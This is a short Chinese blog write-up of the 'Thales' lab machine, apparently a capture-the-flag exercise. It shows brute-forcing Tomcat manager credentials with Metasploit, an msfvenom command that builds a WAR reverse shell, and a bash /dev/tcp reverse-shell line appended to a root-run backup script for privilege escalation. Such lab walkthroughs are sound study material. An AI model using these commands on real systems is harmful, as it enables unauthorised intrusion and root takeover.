扫描打点
8080
是tomcat 9.0.52
必应搜
msf tomcat扫描
第一篇就叫你用msf
爆破账密:msf
搜tomcat
,用这个:爆破出账密:
tomcat:role1
tomcat
后台传shell
登录进去,服务器状态-应用程序列表找到可以文件上传的地方:
查了一下生成
.war
不能用linux/x86/...
那一套,要用java
生成msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=443 -f war -o java_443.war
Linux
提权(一步到位了)去当前用户的目录下找到
notes.txt
,这个地方没看user.txt
(如果看了就会发现没权限)导致忘记先提权到thales
了看到这个可读可写,且有
root
权限那就直接加一段反弹
shell
进去:echo "bash -c 'bash -i >& /dev/tcp/192.168.56.101/1234 0>&1'" >> /usr/local/bin/backup.sh
静置一段时间等回连就行
翻了翻
wp
好像错过先提权到thales
了(逃
学长的任务罢了3-Thales
- 本文链接: http://noone40404.github.io/2024/09/22/学长的任务罢了3:Thales/
- 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!